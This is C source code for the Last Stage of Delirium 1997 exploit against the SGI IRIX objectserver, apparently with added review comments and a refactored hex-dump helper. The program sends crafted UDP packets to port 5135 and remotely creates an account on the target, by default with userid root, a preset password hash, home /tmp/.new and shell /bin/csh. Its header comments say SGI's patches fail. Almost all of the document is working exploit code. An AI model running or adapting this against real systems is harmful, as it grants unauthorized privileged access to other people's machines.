
  1. /*## copyright LAST STAGE OF DELIRIUM jul 1997 poland        *://lsd-pl.net/ #*/
  2. /*## objectserver                                                            #*/
  3.  
  4. /*   SGI objectserver "account" exploit                                       */
  5. /*   Remotely adds account to the IRIX system.                                */
  6. /*   Which was supposed to be free from this bug (SGI 19960101-01-PX).        */
  7. /*   The vulnerability "was corrected" on 6.2 systems but                     */
  8. /*   SGI guys fucked up the job and it still can be exploited.                */
  9. /*   The same applies to patched 5.x, 6.0.1 and 6.1 systems,                  */
  10. /*   where the patches SGI released DON'T work.                               */
  11. /*   The only difference is that root account creation is blocked.            */
  12. /*                                                                            */
  13. /*   usage: ob_account address [-u username] [-i userid] [-p]                 */
  14. /*       -i  specify userid (other than 0)                                    */
  15. /*       -u  change the default added username                                */
  16. /*       -p  probe if there's the objectserver running                        */
  17. /*                                                                            */
  18. /*   default account added       : lsd                                        */
  19. /*   default password            : m4c10r4!                                   */
  20. /*   default user home directory : /tmp/.new                                  */
  21. /*   default userid              : root                                       */
  22.  
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
/* ctype.h, stdlib.h, string.h and unistd.h: isprint(), atoi()/exit(),
   mem*()/str*() and getopt() were all called without a prototype. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
  31. #define E if(errno) perror("");
  32.  
/* Scatter/gather descriptors shared by every request and reply:
   iov[0] is the 16-byte header, iov[1] the body.  show_msg() dumps
   whatever they currently point to. */
struct iovec iov[2];
struct msghdr msg;
/* Receive buffers: the reply header lands in buf1, the reply body in buf2
   (get_sysinfo() also returns a pointer into buf2). */
char buf1[1024],buf2[1024];
/* UDP socket created in main(); never closed before exit. */
int sck;
/* Target address from inet_addr(argv[1]).  main() copies its first 4 bytes
   into fake_adrs — NOTE(review): that is only right where unsigned long is
   32 bits (or the host is little-endian); on a big-endian LP64 host the
   copied bytes would be the zero upper half. */
unsigned long adr;
  38.  
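/* Print len bytes of data as an ASCII column; non-printable bytes become '.'.
   data is unsigned so isprint() never sees a negative value (that is
   undefined behaviour for plain char). */
static void print_ascii(const unsigned char *data,size_t len){
    size_t i;

    for(i=0;i<len;i++){
        if(isprint(data[i])) printf("%c",data[i]);
        else printf(".");
    }
}

/* Hex-dump one region: "<len as %04x>   ", then 16 bytes per row, each row
   followed by its ASCII column.  Layout is the one the original dumper
   produced, so existing output stays comparable. */
static void dump_region(const unsigned char *data,size_t len){
    size_t i,col=0;        /* col = bytes already printed on the current row */

    printf("%04zx   ",len);
    for(i=0;i<len;i++){
        if(col==16){       /* row full: emit its ASCII column, start a new row */
            printf("    ");
            print_ascii(data+i-16,16);
            printf("\n       ");
            col=0;
        }
        printf("%02x ",data[i]);
        col++;
    }
    printf("    ");
    if(col>0){             /* pad a partial last row, then its ASCII column */
        for(i=col;i<16;i++) printf("   ");
        print_ascii(data+len-col,col);
    }
    printf("\n");
}

/* Dump the message currently described by the iov/msg globals: always the
   first iovec and, when two iovecs are in use, the second one.  The body
   length is not iov[1].iov_len but bytes 10-11 of the header, big-endian,
   which is how the header encodes it (see numer_one / dodaj_one[10..11]).

   Changes from the original dumper: bytes are handled as unsigned (so a
   length byte >= 0x80 no longer goes negative and isprint() is well
   defined), size_t is printed with %zx, a trailing row of exactly one
   byte now gets its ASCII column too (the old "c>1" test skipped it),
   and the body length is clamped to iov[1].iov_len so a malformed reply
   cannot drive the dump past the end of buf2. */
void show_msg(void){
    const unsigned char *hdr=(const unsigned char*)iov[0].iov_base;
    size_t body_len=0;

    dump_region(hdr,iov[0].iov_len);
    if(msg.msg_iovlen!=2) return;

    if(iov[0].iov_len>=12) body_len=((size_t)hdr[0x0a]<<8)|hdr[0x0b];
    if(body_len>iov[1].iov_len) body_len=iov[1].iov_len;   /* never read past the buffer */
    dump_region((const unsigned char*)iov[1].iov_base,body_len);
    fflush(stdout);
}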
  107.  
/* Request 1 ("numer" = Polish "number"), sent by get_sysinfo().
   numer_one is the 16-byte header; bytes 10-11 (0x00,0x24 = 36) carry the
   body length, which is also what show_msg() reads to size the second iovec. */
char numer_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};

/* 0x24-byte body of request 1. */
char numer_two[0x24]={
    0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
    0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
    0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
    0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
    0x01,0x07,0x01,0x01
};

/* Request 2 ("dodaj" = Polish "add"), sent by new_account().  Header with
   the body length at bytes 10-11 (0x01,0x2a = 298 as preset); main()
   overwrites those two bytes with the real assembled length. */
char dodaj_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};

/* Body of request 2.  Only the first 13 bytes are preset; its last 6 bytes
   (0x0a,0x01,0x01,0x3b,0x01,0x78) are the same tag get_sysinfo() searches
   for in the reply.  main() appends, in order: the length-prefixed system
   ID, dodaj_three, the length-prefixed username, dodaj_four, the userid
   field and dodaj_five, into this 1024-byte buffer. */
char dodaj_two[1024]={
    0x1c,0x03,0x00,0x43,0x02,0x01,0x1d,0x0a,
    0x01,0x01,0x3b,0x01,0x78
};

/* 27 bytes copied directly after the system ID. */
char dodaj_three[27]={
    0x01,0x02,0x0a,0x01,0x01,0x3b,
    0x01,0x78,0x00,0x00,0x80,0x43,0x01,0x10,
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
    0x01,0x01,0x09,0x43,0x01
};

/* 200 bytes copied after the username.  Readable ASCII inside, each preceded
   by 0x43,0x01,<len>: "LsD", a 13-byte "akFJdxenKnyS." (presumably the
   crypt(3) hash of the default password from the header comment — not
   verified here), "/tmp/.new" (the default home directory) and "root".
   That "root" sits 15 bytes before the end; main() overwrites it with
   "user" when -i is given (see gr_offset there). */
char dodaj_four[200]={
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x02,
    0x01,0x01,0x01,0x09,0x43,0x01,0x03,0x4c,
    0x73,0x44,0x17,0x0b,0x01,0x01,0x3b,0x01,
    0x6e,0x01,0x06,0x01,0x09,0x43,0x00,0x17,
    0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,0x07,
    0x01,0x09,0x43,0x00,0x17,0x0b,0x01,0x01,
    0x3b,0x01,0x02,0x01,0x03,0x01,0x09,0x43,
    0x00,0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,
    0x01,0x09,0x01,0x09,0x43,0x00,0x17,0x0b,
    0x01,0x01,0x3b,0x01,0x6e,0x01,0x0d,0x01,
    0x09,0x43,0x00,0x17,0x0b,0x01,0x01,0x3b,
    0x01,0x6e,0x01,0x10,0x01,0x09,0x43,0x00,
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
    0x0a,0x01,0x09,0x43,0x00,0x17,0x0b,0x01,
    0x01,0x3b,0x01,0x6e,0x01,0x0e,0x01,0x03,
    0x01,0x09,0x17,0x0b,0x01,0x01,0x3b,0x01,
    0x6e,0x01,0x04,0x01,0x09,0x43,0x01,0x0d,
    0x61,0x6b,0x46,0x4a,0x64,0x78,0x65,0x6e,
    0x4b,0x6e,0x79,0x53,0x2e,0x17,0x0b,0x01,
    0x01,0x3b,0x01,0x6e,0x01,0x11,0x01,0x09,
    0x43,0x01,0x09,0x2f,0x74,0x6d,0x70,0x2f,
    0x2e,0x6e,0x65,0x77,0x17,0x0b,0x01,0x01,
    0x3b,0x01,0x6e,0x01,0x12,0x01,0x09,0x43,
    0x01,0x04,0x72,0x6f,0x6f,0x74,0x17,0x0b,  
    0x01,0x01,0x3b,0x01,0x6e,0x01,0x02,0x01,
    0x03
};

/* 39 bytes appended last: "/bin/csh" (length 8) and "LSD" (length 3),
   again as 0x43,0x01,<len>,<string>. */
char dodaj_five[39]={
    0x17,0x0b,0x01,0x01,0x3b,0x01,
    0x6e,0x01,0x13,0x01,0x09,0x43,0x01,0x08,
    0x2f,0x62,0x69,0x6e,0x2f,0x63,0x73,0x68,
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x6e,0x01,
    0x0f,0x01,0x09,0x43,0x01,0x03,'L','S','D'
};

/* Socket address image passed as msg_name (namelen 0x10).  Looks like a
   big-endian sockaddr_in: family 0x0002 (AF_INET), port 0x140f (5135),
   then 4 address bytes that main() replaces with the result of
   inet_addr(argv[1]); the 0xff bytes are only placeholders. */
char fake_adrs[0x10]={
    0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  179.  
/*
 * Send request 1 (numer_one header + numer_two body) on the global socket
 * and scan the reply for the remote system ID.
 *
 * Uses the file-scope iov/msg/buf1/buf2/sck globals.  The msghdr is filled
 * through the 4.3BSD msg_accrights/msg_accrightslen members; a POSIX msghdr
 * has msg_control/msg_controllen instead, so this only builds on systems
 * that still provide the old layout.
 *
 * Returns a pointer into buf2 at the ID's length byte (that byte, then that
 * many ID bytes follow), or 0 when the 6-byte tag is not found.
 * NOTE(review): the sendmsg()/recvmsg() results are printed with %04x
 * (they are ssize_t) and never checked; on a recvmsg() failure len is -1,
 * the bound len-0x16 is negative, and the function just returns 0.
 */
char *get_sysinfo(){
    int i=0,j,len;

    /* iovec 0: 16-byte header, iovec 1: 0x24-byte body */
    iov[0].iov_base=numer_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=numer_two;
    iov[1].iov_len=0x24;
    /* destination is the sockaddr image in fake_adrs; main() patched the address in */
    msg.msg_name=(caddr_t)fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    msg.msg_accrights=(caddr_t)0;
    msg.msg_accrightslen=0;
    printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
    printf("\n");

    /* receive: iov[0].iov_len is still 0x10 from the send, so the first 16
       reply bytes land in buf1 and up to 0x200 more in buf2; len counts both */
    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
    printf("\n");
    /* look for the 6-byte tag; the byte after it is the ID length, then the ID.
       NOTE(review): buf2[i+6] is a plain char, so a length byte >= 0x80 reads
       as negative and the loop below prints nothing. */
    while(i<len-0x16) 
        if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
            printf("remote system ID: ");
            for(j=0;j<buf2[i+6];j++) printf("%02x ",buf2[i+7+j]);
            printf("\n"); 
            return(&buf2[i+6]);
        }else i++;
    return(0);
}
  211.  
/*
 * Send request 2: the dodaj_one header plus the first len bytes of the
 * dodaj_two body that main() assembled, then dump whatever comes back.
 *
 * len: number of valid bytes in dodaj_two (main() also stores it in
 *      dodaj_one[10..11]).  Same globals and 4.3BSD msghdr layout as
 *      get_sysinfo().
 * NOTE(review): the sendmsg()/recvmsg() results are printed with %04x
 * (they are ssize_t) and never checked, so a failed send or a timeout is
 * indistinguishable from success apart from the printed count.
 */
void new_account(int len){
    iov[0].iov_base=dodaj_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=dodaj_two;
    iov[1].iov_len=len;
    msg.msg_name=(caddr_t)fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    msg.msg_accrights=(caddr_t)0;
    msg.msg_accrightslen=0;
    printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
    printf("\n");

    /* reply: header into buf1 (iov[0].iov_len still 0x10), body into buf2 */
    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
    printf("\n");
}
  233.  
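/* Print the command-line synopsis.  text is argv[0].
   The option letters now match getopt("u:i:p") in main() and the header
   comment; the previous text advertised "-v userid" although no -v option
   exists (it was rejected by getopt as '?'). */
void info(char *text){
    printf("usage: %s address [-u username] [-i userid] [-p]\n",text);
}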
  237.  
/*
 * Entry point.  argv[1] is the target address; the options after it are
 * parsed with getopt("u:i:p").  Always sends request 1 via get_sysinfo();
 * unless -p was given, assembles request 2 in dodaj_two and sends it via
 * new_account().
 *
 * NOTE(review): implicit int return type and no return statement (pre-C99).
 * socket() and inet_addr() results are not checked, and strcpy(username,
 * optarg) copies an argument of any length into a 20-byte stack buffer.
 */
main(int argc,char **argv){
    int c,user,version,probe;              /* version!=0 <=> -i was given */
    unsigned int offset,gr_offset,userid;  /* userid is only set, and only read, with -i */
    char *sys_info;
    char username[20];                     /* NOTE(review): overflowable via -u, see strcpy below */
    extern char *optarg;
    extern int optind; 

    printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/\n");
    printf("objectserver for irix 5.2 5.3 6.2 IP:all\n\n");

    if(argc<2) {info(argv[0]);exit(0);}
    optind=2;                      /* argv[1] is the address; options start after it */
    offset=40;                     /* 13 preset bytes of dodaj_two + 27 bytes of dodaj_three */
    user=version=probe=0;
    while((c=getopt(argc,argv,"u:i:p"))!=-1){
        switch(c){
        case 'u': strcpy(username,optarg);   /* NOTE(review): unbounded copy into username[20] */
                  user=1;
                  break;
        case 'i': version=62;                /* selects the "user"+userid variant below */
                  userid=atoi(optarg);
                  break;
        case 'p': probe=1;
                  break;
        case '?':
        default : info(argv[0]); 
                  exit(1);
        }
    }

    sck=socket(AF_INET,SOCK_DGRAM,0);      /* NOTE(review): -1 not checked */
    adr=inet_addr(argv[1]);                /* NOTE(review): INADDR_NONE not checked */
    memcpy(&fake_adrs[4],&adr,4);          /* patch the address into the sockaddr image */

    if(!(sys_info=get_sysinfo())){
        printf("error: can't get system ID for %s.\n",argv[1]);
        exit(1);
    }
    if(!probe){
        /* body layout: [13 preset][len byte + ID][dodaj_three][len byte + username]
           [dodaj_four][userid field][dodaj_five]; offset tracks the write position.
           NOTE(review): sys_info[0] is a plain char, so an ID length byte >= 0x80
           turns these memcpy sizes negative (huge as size_t). */
        memcpy(&dodaj_two[0x0d],sys_info,sys_info[0]+1);
        memcpy(&dodaj_two[0x0d+sys_info[0]+1],&dodaj_three[0],27);
        offset+=sys_info[0]+1; 

        if(!user) strcpy(username,"lsd");
        dodaj_two[offset++]=strlen(username);            /* length-prefixed username */
        strcpy(&dodaj_two[offset],username);offset+=strlen(username);
        memcpy(&dodaj_two[offset],&dodaj_four[0],200);
        offset+=200;
        gr_offset=offset-15;   /* position of the "root" literal near the end of dodaj_four */
        if(version){ 
            /* -i: overwrite "root" with "user", then append 0x02 followed by
               the userid as two big-endian bytes */
            dodaj_two[gr_offset++]='u'; 
            dodaj_two[gr_offset++]='s'; 
            dodaj_two[gr_offset++]='e'; 
            dodaj_two[gr_offset++]='r'; 
            dodaj_two[offset++]=0x02;
            dodaj_two[offset++]=userid>>8;
            dodaj_two[offset++]=userid&0xff; 
        }
        else dodaj_two[offset++]=0x00; 
    
        memcpy(&dodaj_two[offset],&dodaj_five[0],39);
        offset+=39;
        dodaj_one[10]=offset>>8;       /* body length into header bytes 10-11, big-endian */
        dodaj_one[11]=offset&0xff;
        new_account(offset);
    }
}